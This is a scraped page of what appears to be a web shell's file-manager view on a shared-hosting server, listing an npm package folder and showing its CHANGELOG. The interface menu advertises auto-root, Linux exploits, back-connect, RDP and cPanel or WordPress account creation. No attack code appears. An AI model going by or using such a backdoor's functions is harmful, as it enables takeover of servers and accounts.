Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.15.18.221
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
json-stringify-safe /
[ HOME SHELL ]
Name
Size
Permission
Action
.npmignore
7
B
-rw-r--r--
CHANGELOG.md
734
B
-rw-r--r--
LICENSE
765
B
-rw-r--r--
Makefile
675
B
-rw-r--r--
README.md
1.23
KB
-rw-r--r--
package.json
1.7
KB
-rw-r--r--
stringify.js
907
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHANGELOG.md
## Unreleased - Fixes stringify to only take ancestors into account when checking circularity. It previously assumed every visited object was circular which led to [false positives][issue9]. Uses the tiny serializer I wrote for [Must.js][must] a year and a half ago. - Fixes calling the `replacer` function in the proper context (`thisArg`). - Fixes calling the `cycleReplacer` function in the proper context (`thisArg`). - Speeds serializing by a factor of Big-O(h-my-god-it-linearly-searched-every-object) it had ever seen. Searching only the ancestors for a circular references speeds up things considerably. [must]: https://github.com/moll/js-must [issue9]: https://github.com/isaacs/json-stringify-safe/issues/9
Close